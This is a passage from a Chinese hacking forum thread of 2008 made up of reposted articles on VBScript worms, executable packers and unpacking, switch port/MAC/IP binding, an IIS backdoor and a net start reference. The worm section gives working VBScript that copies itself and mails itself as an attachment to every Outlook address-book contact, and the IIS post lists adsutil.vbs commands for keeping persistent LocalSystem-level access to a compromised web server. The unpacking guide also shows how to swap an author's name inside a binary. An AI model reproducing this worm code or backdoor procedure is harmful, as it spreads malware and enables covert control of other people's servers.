中创建一个TXT文件了。倘若我们把第二句改为:
objFs.GetFile (Wscript.scriptFullName).Copy

("C:\virus.vbs")
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚

本文件,Wscript.scriptFullName指明是这个程序本身,是一个完整

的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复

制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我

复制的功能,已经具备病毒的基本特征——自我复制能力。
此类病毒往往是通过邮件传播的,在vb script中调用邮件发送功能

也非常的简单,病毒往往采用的方法是向outlook中的地址薄中的邮

件地址发送带有包含自身的邮件来达到传播目的,一个简单的实例如

下:
Set objOA=Wscript.CreateObject ("Outlook.Application")(创

建一个OUTLOOK应用的对象)
Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间


For i=1 to objMapi.AddressLists.Count(遍历地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))

(取得收件人邮件地址 )  objMail.Subject="你好!" (设置邮

件主题,这个往往具有很大的诱惑性质)
objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容


objMail.Attachments.Add (“c:\virus.vbs")(把自己作为附件

扩散出去 )
objMail.Send  (发送邮件)
Next
Next
Set objMapi=Nothing  (清空objMapi变量,释放资源)
set objOA=Nothing  (清空objOA变量)
  这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自

己作为附件扩散出去。这段代码中的第一行是创建一个Outlook的对

象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中

的电子邮件地址发送内容相同的信件。这就是蠕虫的传播性。
由此可以看出,利用vb script编写病毒是非常容易的,这就使得此

类病毒的变种繁多,破坏力极大,同时也是非常难以根除的!
2.4个人用户对蠕虫病毒的防范措施
通过上述的分析,我们可以知道,病毒并不是非常可怕的,网络蠕虫

病毒对个人用户的攻击主要还是通过社会工程学,而不是利用系统漏

洞!所以防范此类病毒需要注意以下几点:




1.购合适的杀毒软件!网络蠕虫病毒的发展已经使传统的杀毒软件

的“文件级实时监控系统”落伍,杀毒软件必须向内存实时监控和邮

件实时监控发展!另外面对防不胜防的网页病毒,也使得用户对杀毒

软件的要求越来越高!在杀毒软件市场上,赛门铁克公司的norton系

列杀毒软件在全球具有很大的比例!经过多项测试,norton杀毒系列

软件脚本和蠕虫阻拦技术能够阻挡大部分电子邮件病毒,而且对网页

病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的

水平.像瑞星,kv系列等杀毒软件,在杀毒软件的同时整合了防火强功

能,从而对蠕虫兼木马程序有很大克制作用.
2 。经常升级病毒库,杀毒软件对病毒的查杀是以病毒的特征码为依

据的,而病毒每天都层出不穷,尤其是在网络时代,蠕虫病毒的传播速

度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!
3.提高防杀毒意识.不要轻易去点击陌生的站点,有可能里面就含有

恶意代码!
当运行IE时,点击“工具→Internet选项→安全→ Internet区域的

安全级别”,把安全级别由“中”改为“高” 。、因为这一类网页

主要是含有恶意代码的ActiveX或Applet、 javascript的网页文件

,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可

以大大减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点

击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标

签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把

其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”

。但是,这样做在以后的网页浏览过程中有可能会使一些正常应用

ActiveX的网站无法浏览。
4.不随意查看陌生邮件,尤其是带有附件的邮件,,由于有的病毒

邮件能够利用ie和outlook的漏洞自动执行,所以计算机用户需要升

级ie和outlook程序,及常用的其他应用程序!


三小结
网络蠕虫病毒作为一种互联网高速发展下的一种新型病毒,必将对网

络产生巨大的危险。在防御上,已经不再是由单独的杀毒厂商所能够

解决,而需要网络安全公司,系统厂商,防病毒厂商及用户共同参与

,构筑全方位的防范体系!
蠕虫和黑客技术的结合,使得对蠕虫的分析,检测和防范具有一定的

难度,同时对蠕虫的网络传播性,网络流量特性建立数学模型也是有

待研究的工作!
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 53 发表于: 2008-06-14 22:48:50
壳(上)

首先我想大家应该先明白“壳”的概念。在自然界中,我想大家对壳这东西应该都不会陌生了,植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序和自然界的壳在功能上有很多相同的地方,基于命名的规则,大家就把这样的程序称为“壳”了。就像计算机病毒和自然界的病毒一样,其实都是命名上的方法罢了。

   最早提出“壳”这个概念的,据我所知,应该是当年推出脱壳软件 RCOPY 3 的作者熊焰先生。在几年前的 DOS 时代,“壳”一般都是指磁盘加密软件的段加密程序,可能是那时侯的加密软件还刚起步不久吧,所以大多数的加密软件(加壳软件)所生成的“成品”在“壳”和需要加密的程序之间总有一条比较明显的“分界线”。有经验的人可以在跟踪软件的运行以后找出这条分界线来,至于这样有什么用这个问题,就不用我多说了。但毕竟在当时,甚至现在这样的人也不是很多,所以当 RCOPY3 这个可以很容易就找出“分界线”,并可以方便的去掉“壳”的软件推出以后,立即就受到了很多人的注意。老实说,这个我当年在《电脑》杂志看到广告,在广州电脑城看到标着999元的软件,在当时来说,的确是有很多全新的构思,单内存生成 EXE 可执行文件这项,就应该是世界首创了。但它的思路在程序的表现上我认为还有很多可以改进的地方(虽然后来出现了可以加强其功力的 RO97),这个想法也在后来和作者的面谈中得到了证实。在这以后,同类型的软件想雨后春笋一般冒出来,记得住名字的就有: UNKEY、MSCOPY、UNALL .... 等等,但很多的软件都把磁盘解密当成了主攻方向,忽略了其它方面,当然这也为以后的“密界克星”“解密机器”等软件打下了基础,这另外的分支就不多祥谈了,相信机龄大一点的朋友都应该看过当时的广告了。

   解密(脱壳)技术的进步促进、推动了当时的加密(加壳)技术的发展。LOCK95和 BITLOK 等所谓的“壳中带籽”加密程序纷纷出笼,真是各出奇谋,把小小的软盘也折腾的够辛苦的了。正在国内的加壳软件和脱壳软件较量得正火红的时候,国外的“壳” 类软件早已经发展到像 LZEXE 之类的压缩壳了。这类软件说穿了其实就是一个标准的加壳软件,它把 EXE 文件压缩了以后,再在文件上加上一层在软件被执行的时候自动把文件解压缩的“壳”来达到压缩 EXE 文件的目的。接着,这类软件也越来越多, PKEXE、AINEXE、UCEXE 和后来被很多人认识的 WWPACK 都属于这类软件,但奇怪的是,当时我看不到一个国产的同类软件。

   过了一段时间,可能是国外淘汰了磁盘加密转向使用软件序列号的加密方法吧,保护 EXE 文件不被动态跟踪和静态反编译就显得非常重要了。所以专门实现这样功能的加壳程序便诞生了。 MESS 、CRACKSTOP、HACKSTOP、TRAP、UPS 等等都是比较有名气的本类软件代表,当然,还有到现在还是数一数二的,由中国台湾同胞所写的 FSE 。其实以我的观点来看,这样的软件才能算是正宗的加壳软件。

  在以上这些加壳软件的不断升级较劲中,很多软件都把比较“极端”技术用了上去,因为在这个时候 DOS 已经可以说是给众高手们玩弄在股掌之间了,什么保护模式、反 SICE 、逆指令等等。相对来说,在那段时间里发表的很多国外脱壳程序,根本就不能对付这么多的加壳大军,什么 UPC、TEU 等等都纷纷成为必防的对象,成绩比较理想的就只有 CUP386 了,反观国内,这段时间里也没了这方面的“矛盾斗争”。加壳软件门挥军直捣各处要岗重地,直到在我国遇到了 TR 这个铜墙铁壁以后,才纷纷败下阵来各谋对策,但这已经是一年多以后的事情了。我常想,如果 TR 能早两年“出生”的话,成就肯定比现在大得多,甚至盖过 SICE 也有可能。TR 发表的时候 WIN95 的流行已经成为事实,DOS 还有多少的空间,大家心里都清楚。但话又说回来, TR 的确是个好软件,比起当年的 RCOPY3 有过之而无不及,同时也证明了我们中国的 CRACK 实力(虽然有点过时)。这个时候,前面提到过的 FSE 凭着强劲的实力也渐渐的浮出了水面,独领风骚。其时已经是 1997 年年底了,我也走完了学生“旅程”。工作后在CFIDO 的 CRACK 区认识了 Ding-Boy ,不久 CRACK 区关了,我从此迷上了 INTERNET,并于98年6月建起了一个专门介绍“壳”的站台: http://topage.126.com ,放上了我所收集的所有“壳”类软件。在这段时间里,各种“壳”类软件也在不段的升级换代,但都没什么太大的进展,差不多就是 TR 和众加壳软件的版本数字之争而已。

?? 1998年8月,一个名为 UNSEC (揭秘)的脱壳软件发表了,它号称可以脱掉98年8月以前发表的所有壳。我测试之后,觉得并没传闻中的那么厉害,特别是兼容性更是令我不想再碰它。 Ding-Boy 给这个软件的作者提了很多建议,但寄去的 EMIAL 有如泥牛入海,可能是一怒之下吧,不久 Ding-Boy 的 BW (冲击波)就诞生了。这个使用内存一次定位生成 EXE 文件(后来放弃了)的脱壳软件,在我的站台公开后,得到了很多朋友们的肯定。要知道,从RCOPY 3 开始,绝大部分的脱壳软件都是要两次运行目标程序来确定 EXE 的重定位数据的。BW 的这一特点虽然有兼容性的问题,但也树立了自己的风格、特色。经过几个月的改善, BW 升级到了 2.0 版本,这个版本的推出可以说是 BW 的转折点,因为它已经是一个成熟、稳定脱壳软件了,它可以对付当时(现在)大多数的壳,包括当时最新的 FSE 0.6 等。更重要的是这个版本把选择壳的和软件“分界线”这个最令新手头疼的步骤简化到不能再简化的地步,使更多的朋友接受了它。另外,能加强 BW 功力的 CI 模式也是其它脱壳软件没有的东西。最近,BW 发表了最新的 2.5 BETA2 版本,增强了一些方面的功能,因它竟然可以脱掉号称最厉害的磁盘加密工具 LOCKKING 2.0 的加密壳,因而进一步奠定了它在“脱壳界”的地位。说到最新,就不能不提 GTR、LTR、EDUMP、ADUMP、UPS、UPX、APACK 这几个国外的好软件了,它们每个都有自己的特色,可以说都是当今各类“壳”中的最新代表了。(这些软件和详细介绍请到我的主页查阅)

  由于 WINDOWS 3.1 只是基于 DOS 下的一个图形外壳,所以在这个平台下的“壳”类软件很少,见过的就只有像 PACKWIN 等几个有限的压缩工具,终难成气候。

   可能是 MICROSOFT 保留了 WIN95 的很多技术上的秘密吧,所以即便是 WIN95 已经推出了 3 年多的时间,也没见过在其上面运行的“壳”类软件。直到 98 年的中期,这样的软件才迟迟的出现,而这个时候 WIN98 也发表了有一段日子了。应该是有 DOS 下的经验吧,这类的软件不发表由自可,一发表就一大批地的冲了出来。先是加壳类的软件如: BJFNT、PELOCKNT 等,它们的出现,使暴露了 3 年多的 WIN95 下的 PE 格式 EXE 文件得到了很好的保护。大家都应该知道现在很多 WIN95 下的软件都是用注册码的方法来区分、确定合法与非法用户的吧,有了这类加壳软件,这种注册方法的安全性提高了不少,如果大家也有自己编的 WIN95 程序,就一定要多留意一下本类软件了。接着出现的就是压缩软件了,因为 WIN95 下运行的 EXE 文件“体积”一般都比较大,所以它的实用价值比起 DOS 下的压缩软件要大很多,这类的软件也很多,早些时候的 VBOX、PEPACK、PETITE 和最近才发表的 ASPACK、UPX 都是其中的佼佼者。在 DOS 下很流行的压缩软件 WWPACK 的作者也推出了对应 WIN95 版本的 WWPACK32,由于性能并不是十分的突出,所以用的人也不太多。由于压缩软件其实也是间接给软件加了壳,所以用它们来处理 EXE 也是很多软件作者喜欢做的事情,最近新发表的很多软件里都可以看到这些加壳、加压缩软件的名字了。有加壳就一定会有脱壳的,在 WIN95 下当然也不例外,但由于编这类软件比编加壳软件要难得多,所以到目前为止,我认为就只有 PROCDUMP 这个软件能称为通用脱壳软件了,它可以对付现在大多数的加壳、压缩软件所加的壳,的确是一个难得的精品。其它的脱壳软件多是专门针对某某加壳软件而编,虽然针对性强、效果好,但收集麻烦,而且这样的脱壳软件也不多。前些时候 TR 作者也顺应潮流发表了 TR 的 WIN95 版本: TRW ,由现在的版本来看可以对付的壳还不多,有待改进。

  BW 的作者 Ding-Boy 最新发表了一个 WIN95 的 EXE 加壳软件 DBPE 。虽然它还不太成熟,但它可以为软件加上使用日期限制这个功能是其它加壳软件所没有的,或者以后的加壳软件真的会是像他说的那样可以:加壳和压缩并重、并施;随意加使用日期;加上注册码;加软件狗(磁盘)保护;加硬件序列号判别;加... 。






一.壳的概念
作者编好软件后,编译成exe可执行文件
1.有一些版权信息需要保护起来,不想让别人随便改动,如作者的姓名等
2.需要把程序搞的小一点,从而方便使用
于是,需要用到一些软件,他们能将exe可执行文件压缩,实现上述两个功能,这些软件称为加壳软件或压缩软件.
它不同于一般的winzip,winrar等压缩软件.它是压缩exe可执行文件的,压缩后的文件可以直接运行.
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 54 发表于: 2008-06-14 22:49:05
壳(下)

二.加壳软件
最常见的加壳软件ASPACK ,UPX,PEcompact
不常用的加壳软件WWPACK32;PE-PACK ;PETITE ;NEOLITE

三.侦测壳和软件所用编写语言的软件
1.侦测壳的软件fileinfo.exe 简称fi.exe(侦测壳的能力极强)使用方法:

第一种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,执行
windows起始菜单的运行,键入fi aa

第二种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,将aa的图标拖到fi的图标上

2.侦测壳和软件所用编写语言的软件language.exe(两个功能合为一体,很棒)?犕萍鰈anguage2000中文版,我的

主页可下载傻瓜式软件,运行后选取待侦测壳的软件即可(open)

3.软件常用编写语言Delphi,VisualBasic(VB)---最难破,VisualC(VC)


脱壳

拿到一个软件,我们首先根据第一课的内容。侦测它的壳,然后我们要把它的壳脱去,还原它的本来面目.若它没有加壳,就省事不用脱壳了.

一.脱壳软件
unaspack,caspr,upx,unpecompact,procdump
二.使用方法
(一)aspack壳 脱壳可用unaspack或caspr
1.unaspack?犖业闹饕晨上略刂形陌?
使用方法类似lanuage
傻瓜式软件,运行后选取待脱壳的软件即可.?犎钡悖褐荒芡補spack早些时候版本的壳,不能脱高版本的壳
2.caspr
第一种:待脱壳的软件(如aa.exe)和caspr.exe位于同一目录下,执行
windows起始菜单的运行,键入 caspr aa.exe
脱壳后的文件为aa.ex_,删掉原来的aa.exe,将aa.ex_改名为aa.exe即可
使用方法类似fi?犛诺悖嚎梢酝補spack任何版本的壳,脱壳能力极强 缺点:Dos界面
第二种:将aa.exe的图标拖到caspr.exe的图标上
***若已侦测出是aspack壳,用unaspack脱壳出错,说明是aspack高版本的壳,用caspr脱即可

(二)upx壳 脱壳可用upx
待脱壳的软件(如aa.exe)和upx.exe位于同一目录下,执行windows起始菜单的运行,键入upx -d aa.exe

(三)PEcompact壳 脱壳用unpecompact
使用方法类似lanuage。傻瓜式软件,运行后选取待脱壳的软件即可

(四)procdump 万能脱壳但不精,一般不要用 我的主页可下载中文版
使用方法:运行后,先指定壳的名称,再选定欲脱壳软件,确定即可
脱壳后的文件大于原文件。由于脱壳软件很成熟,手动脱壳一般用不到,不作介绍.

三. exe可执行文件编辑软件ultraedit
下载它的汉化版本,它的注册机可从网上搜到
ultraedit打开一个中文软件,若加壳,许多汉字不能被认出
ultraedit打开一个中文软件,若未加壳或已经脱壳,许多汉字能被认出
ultraedit可用来检验壳是否脱掉,以后它的用处还很多,请熟练掌握
例如,可用它的替换功能替换作者的姓名为你的姓名
注意字节必须相等,两个汉字替两个,三个替三个,不足处在ultraedit编辑器左边用00补
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 55 发表于: 2008-06-14 22:49:54
目前以太网已经普遍应用于运营领域,如小区接入、校园网等等。但由于以太网本身的开放性、共享性和弱管理性,采用以太网接入在用户管理和安全管理上必然存在诸多隐患。业界厂商都在寻找相应的解决方案以适应市场需求,绑定是目前普遍宣传和被应用的功能,如常见的端口绑定、MAC绑定、IP绑定、动态绑定、静态绑定等。其根本目的是要实现用户的唯一性确定,从而实现对以太网用户的管理。

  一、绑定的由来

  绑定的英文词是BINDING,其含义是将两个或多个实体强制性的关联在一起。一个大家比较熟悉的例子,就是配置网卡时,将网络协议与网卡驱动绑定在一起。其实在接入认证时,匹配用户名和密码,也是一种绑定,只有用户名存在并且密码匹配成功,才认为是合法用户。在这里,用户名已经可以唯一标识某个用户,与对应密码进行一一绑定。

  二、绑定的分类

  从绑定的实现机制上,可以分为AAA(服务器)有关绑定和AAA无关绑定;从绑定的时机上,可以分为静态绑定和动态绑定。

  AAA是用户信息数据库,所以AAA有关绑定以用户信息为核心,认证时设备上传绑定的相关属性(端口、VLAN、MAC、IP等),AAA收到后与本地保存的用户信息匹配,匹配成功则允许用户上网,否则拒绝上网请求。

  AAA无关绑定完全由接入设备实现。接入设备(如Lanswitch)上没有用户信息,所以AAA无关绑定只能以端口为核心,在端口上可以配置本端口可以接入的MAC(或IP)地址列表,只有其MAC地址属于此列表中的计算机才能够从该端口接入网络。

  静态绑定是在用户接入网络前静态配置绑定的相关信息,用户接入认证时,匹配这些信息,只有匹配成功才能接入。

  动态绑定的相关信息不是静态配置的,而是接入时才动态保存到接入设备上,接入网络后不允许用户再修改这些信息,一旦修改,则强制用户下线。

  AAA相关绑定一般都是静态绑定,动态绑定一般都是在接入设备上实现的。接入设备离最终用户最近,用户所有的认证数据流和业务数据流都必须经过接入设备,只有认证数据流经过AAA,所以接入设备可以最容易最及时发现相关绑定信息的变化,也方便采取强制用户下线等处理措施。另外,网络中AAA一般只有一台,集中管理,接入设备却有很多,由分散的接入设备监视用户绑定信息的变化,可以减轻AAA的负担。

  三、绑定的应用模式

  除了常用的用户名与密码绑定外,可以用于绑定的属性主要有:端口、VLAN、MAC地址和IP地址。这些属性的特性不同,其绑定的应用模式也有较大差别。

  1、IP地址绑定

  1)解释

  按照前边的定义标准,IP地址绑定可以分为AAA有关IP地址绑定、AAA无关IP地址绑定、IP地址静态绑定和IP地址动态绑定。

  AAA有关IP地址绑定:在AAA上保存用户固定分配的IP地址,用户认证时,接入设备上传用户机器静态配置的IP地址,AAA将设备上传IP地址与本地保存IP地址比较,只有相等才允许接入。

  AAA无关IP地址绑定:在接入设备上配置某个端口只能允许哪些IP地址接入,一个端口可以对应一个IP地址,也可以对应多个,用户访问网络时,只有源IP地址在允许的范围内,才可以接入。

  IP地址静态绑定:接入网络时检查用户的IP地址是否合法。

  IP地址动态绑定:用户上网过程中,如更改了自己的IP地址,接入设备能够获取到,并禁止用户继续上网






2)应用

  教育网中,学生经常改变自己的IP地址,学校里IP地址冲突的问题比较严重,各学校网络中心承受的压力很大,迫切需要限制学生不能随便更改IP地址。可以采用以下方法做到用户名和IP地址的一一对应,解决IP地址问题。

  如有DHCP Server,可以使用IP地址动态绑定,限制用户上网过程中更改IP地址。此时需要接入设备限制用户只能通过DHCP获取IP地址,静态配置的IP地址无效。如没有DHCP Server,可以使用AAA有关IP地址绑定和IP地址动态绑定相结合方式,限制用户只能使用固定IP地址接入,接入后不允许用户再修改IP地址。通过 DHCP Server分配IP地址时,一般都可以为某个MAC地址分配固定的IP地址,再与AAA有关MAC地址绑定配合,变相的做到了用户和IP地址的一一对应。

  2、MAC地址绑定

  1)解释

  与IP地址绑定类似,MAC地址绑定也可以分为AAA有关MAC地址绑定和AAA无关MAC地址绑定;MAC地址静态绑定和MAC地址动态绑定。

  由于修改了MAC地址之后,必须重新启动网卡才能有效,重新启动网卡就意味着重新认证,所以MAC地址动态绑定意义不大。

  2)应用

  AAA有关MAC地址绑定在政务网或园区网中应用比较多,将用户名与机器网卡的MAC地址绑定起来,限制用户只能在固定的机器上上网,主要是为了安全和防止帐号盗用。但由于MAC地址也是可以修改的,所以这个方法还存在一些漏洞的。

  3、端口绑定

  1)解释

  端口的相关信息包含接入设备的IP地址和端口号。

  设备IP和端口号对最终用户都是不可见的,最终用户也无法修改端口信息,用户更换端口后,一般都需要重新认证,所以端口动态绑定的意义不大。由于AAA无关绑定是以端口为核心了,所以AAA无关端口绑定也没有意义。

  有意义的端口绑定主要是AAA有关端口绑定和端口静态绑定。

  2)应用

  AAA有关端口绑定主要用于政务网、园区网和运营商网络,从而限制用户只能在特定的端口上接入。

  4、VLAN绑定

  1)解释

  与端口绑定类似,VLAN相关信息也配置在接入设备上,最终用户无法修改,所以,VLAN动态绑定意义不大。对于AAA无关VLAN绑定,如只将端口与VLAN ID绑定在一起,那么如果用户自己连一个HUB,就会出现一旦此HUB上的一个用户认证通过,其他用户也可以上网的情况,造成网络接入不可控,所以一般不会单独使用AAA无关的VLAN绑定。

  常用的VLAN绑定是AAA有关VLAN绑定和VLAN静态绑定。





 2)应用

  如网络接入采用二层结构,上层是三层交换机,下层是二层交换机,认证点在三层交换机上,这种情况下,仅靠端口绑定只能限制用户所属的三层交换机端口,限制范围太大,无法限制用户所属的二层交换机端口。

  使用AAA有关VLAN绑定和VLAN静态绑定就可以解决这个问题。

  分别为二层交换机的每个下行端口各自设置不同的VLAN ID,二层交换机上行端口设置为VLAN透传,就产生了一个三层交换机端口对应多个VLAN ID的情况,每个VLAN ID对应一个二层交换机的端口。用户认证时,三层交换机将VLAN信息上传到AAA,AAA与预先设置的信息匹配,根据匹配成功与否决定是否允许用户接入。

  此外,用户认证时,可以由AAA将用户所属的VLAN ID随认证响应报文下发到接入设备,这是另外一个角度的功能。虽然无法限制用户只能通过特定的二层交换机端口上网,但是可以限制用户无论从那个端口接入,使用的都是用一个VLAN ID。这样做的意义在于,一般的DHCP Server都可以根据VLAN划分地址池,用户无论在哪个位置上网,都会从相同的地址池中分配IP地址。出口路由器上可以根据源IP地址制定相应的访问权限。综合所有这些,变相的实现了在出口路由器上根据用户名制定访问权限的功能。

  5、其它说明

  标准的802.1x认证,只能控制接入端口的打开和关闭,如某个端口下挂了一个HUB,则只要HUB上有一个用户认证通过,该端口就处于打开状态,此 HUB下的其他用户也都可以上网。为了解决这个问题,出现了基于MAC地址的认证,某个用户认证通过后,接入设备就将此用户的MAC地址记录下来,接入设备只允许所记录MAC地址发送的报文通过,其它MAC地址的报文一律拒绝。

  为了提高安全性,接入设备除了记录用户的MAC地址外,还记录了用户的IP地址、VLAN ID等,收到的报文中,只要MAC地址、IP地址和VLAN ID任何一个与接入设备上保存的信息匹配不上,就不允许此报文通过。有的场合,也将这种方式称为接入设备的“MAC地址+IP地址+VLAN ID”绑定功能。功能上与前边的AAA无关的动态绑定比较类似,只是用途和目的不同。

  四、业界厂商产品对绑定的支持

  以上的常用绑定功能业界厂商都普遍支持,一些厂商还进行了更有特色的功能开发,如华为提供的以下增强功能:

  1、绑定信息自学习

  1)MAC地址自动学习

  配置AAA相关MAC地址绑定功能时,MAC很长,难以记忆,输入时也经常出错,一旦MAC地址输入错误,就会造成用户无法上网,大大增加了AAA系统管理员的工作量。CAMS实现了MAC地址自动学习功能,可以学习用户第一次上网的MAC地址,并自动与用户绑定,既减少了工作量,又不会出错。以后用户MAC地址变更时,系统管理员将用户绑定的MAC地址清空,CAMS会再次自动学习用户MAC地址。

  2)IP地址自动学习

  与MAC地址自动学习类似。

  2、一对多绑定

  1)IP地址一对多绑定

  用户可以绑定不只一个IP地址,而是可以绑定一个连续的地址段。这个功能主要应用于校园网中,一个教研室一般都会分配一个连续的地址段,教研室的每个用户都可以自由使用该地址段中的任何一个IP地址。教研室内部的网络结构和IP地址经常变化,将用户和教研室的整个地址段绑定后,可以由各教研室自己分配和管理内部IP地址,既不会因教研室内部IP地址分配问题影响整个校园网的正常运转,又可以大大减少AAA系统管理员的工作量。

  2)端口一对多绑定

  与IP地址一对多绑定类似,也存在端口一对多绑定的问题。CAMS将端口信息分成以下几个部分:接入设备IP地址-槽号-子槽号-端口号-VLAN ID,这几个部分按照范围由广到窄的顺序。任何一个部分都可以使用通配符,表示不限制具体数值。比如,端口号部分输入通配符,就表示将用户绑定在某台交换机下的某个槽号的某个子槽号的所有端口上,可以从其中的任何一个端口接入。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 56 发表于: 2008-06-14 22:50:16
永远的后门

IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。


如果你对此有情趣,跟我来...........
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改 iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem 的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
Accessscript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemotescript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
不要告诉我你不知道上面的输出是什么!!!!
现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了

3. mkdir c:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"
这样就建好了一个虚目录:Virtual Dir1
你可以用 1 的命令看一下
5. 接下来要改变一下Virtual Dir1的属性为execute
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false


注释:cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path


这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)

大家不可以用来做非法的攻击,一切后果自负
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 57 发表于: 2008-06-14 22:50:44
NET START可以起用命令一览表

Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
